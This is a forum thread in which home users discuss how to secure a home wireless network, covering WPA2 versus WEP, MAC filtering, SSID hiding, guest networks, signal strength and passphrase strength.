Securing a home wireless network

[wrems]

I realize there is an over-abundance of information regarding securing wireless networks to be found with a Google search. At the same time, I know many of you folks probably know as more and more than some of the so-called experts.

So, what are the best practices when securing a home’s wireless network?

Any links to good sites or articles are appreciated. Any specific hardware recommendations are welcome too. Anything goes.

TIA

[Taddeusz]

This is all my own opinion but I know there are sources that would back it up.

Basically use the best security you can. Meaning WPA or WPA2 (preferably WPA2). Do not use WEP if at all possible. If you have a device that won't do WPA or WPA2 consider replacing it or not using it.

MAC address filtering is worthless. With the proper hardware and software the MAC addresses on your network can be determined and then spoofed.

Hiding your SSID while it may stop the casual wannabe hacker it's not going to stop someone who really wants in. For guests and even some oddball devices it becomes more annoying than useful.

Can't really say I recommend any hardware specifically. I have a Dlink DIR-625 router that I really like. Other than that as long as your router supports WPA2 you're good to go.

[barney B.A.]

Great advice. use wpa, wpa2. By broadcasting your SSID and not using mac address filtering, it becomes convenient to set up your network while still being very secure.

[wrems]

Would mac address filtering in conjunction with wpa/wpa2 make one's network stronger? Or, does it become moot if you're using one of the wpa's? I understand that mac address filtering alone is quite useless.

[GKusnick]

The single most important security precaution is to use strong passwords and don't write them down. If you're the only user of this network, then there's no need to tell anyone your password ever. If you have other users, have them hand over their computers to you so you can type in the password. By far the most common cause of security breaches is passwords that are leaked or easily guessed.

With good password practices, WPA/WPA2 is more than adequate to secure your network. Adding MAC filtering might make you feel better but probably won't make any practical difference.

[Spectrum]

Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios so I use the 5.0GHz and have the 2.4GHz network have internet only access. I can give the password to friends/fam and the worst they can do is use bandwidth assuming they aren't trying to be hackers Even if that network gets compromised, my systems aren't at risk.

[Taddeusz]

Plus, the MAC address is sent with no encryption. So using MAC filtering is really very useless. If someone really wanted to break into a network with MAC filtering it wouldn't be very difficult to monitor traffic and retrieve working MAC addresses.

[david1234]

Quote:

Originally Posted by Spectrum

Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios so I use the 5.0GHz and have the 2.4GHz network have internet only access. I can give the password to friends/fam and the worst they can do is use bandwidth assuming they aren't trying to be hackers Even if that network gets compromised, my systems aren't at risk.

I have something similar, although it's a side effect of not wanting to mess around with the PPOE settings on my router.

I have 2 wireless routers feeding my old non-wireless router (my gateway to the ISP).

One of the wireless routers is my internel network router, and the other is a guest only router without access to my network.

PHP Code:

  ISP
   |
ROUTER----------------
   |                 |
Wireless#1         Wireless#2
   |
INTERNAL NETWORK 


Wireless#2 is basically wide open, but it has no access to anything important.

I replaced Wireless#1 with a WRT54G from Buffalo (newegg had a good sale on the WHR-HP-GN) while I was off of work at Christmas time. I was planning to install the tomato firmware, but the interface that came with the router has been very good.

[gibsonpa]

Quote:

Originally Posted by Spectrum

Another thing that helps tremendously is having a guest network that only has internet access. My router has 2.4GHz and 5.0GHz radios so I use the 5.0GHz and have the 2.4GHz network have internet only access. I can give the password to friends/fam and the worst they can do is use bandwidth assuming they aren't trying to be hackers Even if that network gets compromised, my systems aren't at risk.

I have a Netgear WNDR3700 that has this guest feature...has worked very well.

[wrems]

Quote:

Originally Posted by gibsonpa

I have a Netgear WNDR3700 that has this guest feature...has worked very well.

I've been eyeballing that router myself

[blade]

I agree with what everyone else has said. MAC filtering and hiding the SSID is a waste of time and just makes it more inconvenient for you. Never use WEP because it can be cracked in a matter of minutes. Unless I absolutely have to I'm not using anything less than WPA2. As was mentioned, having a very good password or pass phrase is a must. I think my pass phrase is around 27 characters long and includes numbers, letters and symbols. The phrase has a specific meaning to me so it's easy for me to remember, but isn't something that someone else is going to know.

Another thing to remember is that if someone can't get a signal they can't even begin to hack your network. Some routers and WAPs allow you to adjust the signal strength. Placing the router in a central location and reducing the signal strength as much as possible while still maintaining a good signal where you'll be using it is a good way to reduce the risk of being hacked.

If your router doesn't allow you to adjust the signal strength consider intentionally putting it somewhere to reduce the signal. For example my WAP is in my basement. I can still get good signal anywhere in my house and on my deck, but it does reduce the chance that a neighbor or someone sitting in a car down the street is going to be able to attempt a connection.

I've also considered setting up a second wireless AP that only has internet access for guest. I haven't done it yet because there's very few people that bring wireless devices into my home.

As for a good security site I ran across Wilders a few months ago and it has some good information.

I know this is more than just securing wireless, but I thought I'd share the changes I've made to my home network over the last few months. I recently started thinking more about security since it seems everyone I know ends up bringing me their computers because of viruses and such. I replaced my old router with Untangle (Unified Threat Management software). I run the Phish Block, Spy Ware Block, Virus Blocker, Intrusion Prevention, Firewall, Ad Blocker & Attack Blocker modules all of which are free.

I run XP Home so I set passwords for the Guest Accounts so that when I share a folder it at least requires a password to access them. I also finally got around to setting up passwords to the admin account that can only be accessed through safe mode.

I started using limited user accounts in XP with SuRun to make things more manageable. I now run my web browser using Sandboxie so anything I launch from the web browser is also launched in the sandbox.

I'm also using TrueCrypt. All of my private/personal files are stored in a true crypt volume. I'm prompted for the password when I login and the volumes are auto-dismounted when I logout. I've tried to make it a habit of logging out of Windows when I'm finished. TrueCrypt is generally for providing physical protection of the files if a computer is stolen; however, I don't always mount the drives when I login to Windows. I usually just mount it when I need to access the files. So if I did get hacked or have a virus/trojan they wouldn't have access until I mounted the volume. Hopefully my anti-virus would have been updated and detected it by the time my private/personal files were mounted.

Lastly I have Acronis encrypt my backup files. I have no idea how secure it's encryption really is, but I figure it's better than having my private/personal files sitting on a NAS unencrypted if everything else is locked down.

[tmiranda]

Quote:

Originally Posted by wrems

I've been eyeballing that router myself

I just purchased one and am pleased with it. I still haven't figured out the whole "guest" thing yet so for now it's all locked down with WPA2.

The only thing that seemed unsecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.

[Nelbert]

Use a password generator to create the passphrase, don't keep pressing generate until you get something you think is random and use a long passphrase. People are rubbish at random and tend to choose random outcomes based on false logic.

Even with something as basic as random coin flip predictions for 100 flips, the imaginary flips vs the actual flips can be spotted without too much difficulty. Real world random is clumpy, imaginary random has things like "I've just had 3 tails, so the next one must be a head" in it and rejects clumpy.

Alternatively, if you don't want to use a random password generator md5sum a file that has random or changing contents in it, eg a swap file, even wiz.bin would do as it's specific to your machine.

Last November WPA-PSK was brute force dictionary cracked in ~20 mins for a few dollars using Amazon servers. Why? To show WPA-PSK isn't as secure as everyone claims, it isn't time consuming, doesn't require specialist hardware and isn't expensive to do. The current challege is to reduce the time/cost even further.

The only consumer wireless encrytion not broken is WPA-PSK2, so if you do use WPA-PSK don't use dictionary phrases if you're concerned about it being hi-jacked/abused.

[david1234]

Quote:

Originally Posted by tmiranda

The only thing that seemed unsecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.

I give bonus points to software that I can "unmask" the password. The more secure the passphrase, the more I need to see the field. Besides, how often is somebody really looking over my shoulder when I'm logging in?

[Nelbert]

Quote:

Originally Posted by tmiranda

I just purchased one and am pleased with it. I still haven't figured out the whole "guest" thing yet so for now it's all locked down with WPA2.

The only thing that seemed unsecure to me was that the setup screen used to enter the passphrase prints the characters rather than using asterisks ("*"). This means I need to make the router password at least as secure as the passphrase.

Not a bad thing given the last wild virus/trojan "call it what you will" that attempted to hijack routers was launched from the users pc using a simple password list. It was helped by the fact that so few people change the router password from it's default.

[GKusnick]

Quote:

Originally Posted by david1234

Besides, how often is somebody really looking over my shoulder when I'm logging in?

Don't forget the Van Eck phreak out in the parking lot reading the electromagnetic signal from your monitor.

[QueOnda]

Quote:

Originally Posted by GKusnick

Don't forget the Van Eck phreak out in the parking lot reading the electromagnetic signal from your monitor.

http://upe.acm.jhu.edu/websites/Jon_Grover/page2.htm

I don't think that works for LCD or plasma or DLP OR LCOS monitors. Does it? LOL

[eric3a]

And then there's physical security: Live far enough away from anyone. You will probably notice the guy sitting in your backyard with a laptop trying to get in.
I don't have a large yard or house, but my wifi signal doesn't make it to public land. I've tried many times.
I guess maybe some antennas might be able to pick the signal up, but really I think someone would notice a dude sitting in front of my house aiming some weird antenna at it.
All my neighbors have guns, and most are redneck... Which is probably another way of securing our wifi systems from wandering geeks doing weird things in our small neighborhood?!!

I am assuming you live in higher density area where you don't know/trust your neighbors and potential visitors.
Eric

[reggie14]

I'd just like to echo what everyone else said about using WPA/WPA2 with a strong password, and don't bother with MAC address filtering or hiding your SSID.

Ideally you'd use WPA2-AES-CCMP. But, you might have some devices that don't can't use AES. It's not a big deal if you have to configure your router to use both TKIP or AES. WPA2-TKIP is theoretically a little worse than WPA2-AES, but in practice the difference doesn't really matter from a security perspective.

The bigger problem is that you actually want to use the stronger WPA2-AES for performance reasons. The TKIP algorithm runs in software on the host CPU, whereas wireless routers have a crypto chip that handles AES encryption/decryption. The end result is that you'd probably need to use WPA2-AES to max a 802.11n connection. But, you should be safe running your wifi router in WPA2-TKIP+AES mode. Devices should default to using WPA2-AES-CCMP when possible.

You also don't need to go overboard on the passphrase. In my opinion, there's no good reason to use a randomly-generated 24+ character passphrase on a home network. Even against a dedicated attacker willing to use EC2, you're probably pretty safe with a ~10 character password with mixed-case letters and numerals. Just make sure you don't pick something that has any chance of being in a dictionary (don't use any words, or any variations of words, like replacing the letter 'I' with the number '1'). Yes, people are bad at coming up with truly random passphrases, but really you just need something that won't be in a dictionary.

I think Nelbert is exaggerating security problems in WPA. WPA-TKIP is still basically fine. The brute force attack on WPA-PSK wasn't quite as bad as it sounds. At least, the "attack" I know could brute force a 6-character single-case key in 6 minutes. By bumping that to a 10-character single-case key it takes 5 years. Use mixed-case and numbers and it takes 26984 years. Sure, an attacker could simply throw more EC2 VMs at cracking the key, but you get the picture. It's not trivial.

[GKusnick]

Quote:

Originally Posted by reggie14

Yes, people are bad at coming up with truly random passphrases...

And even worse at remembering them. You want something you can remember without having to write it down.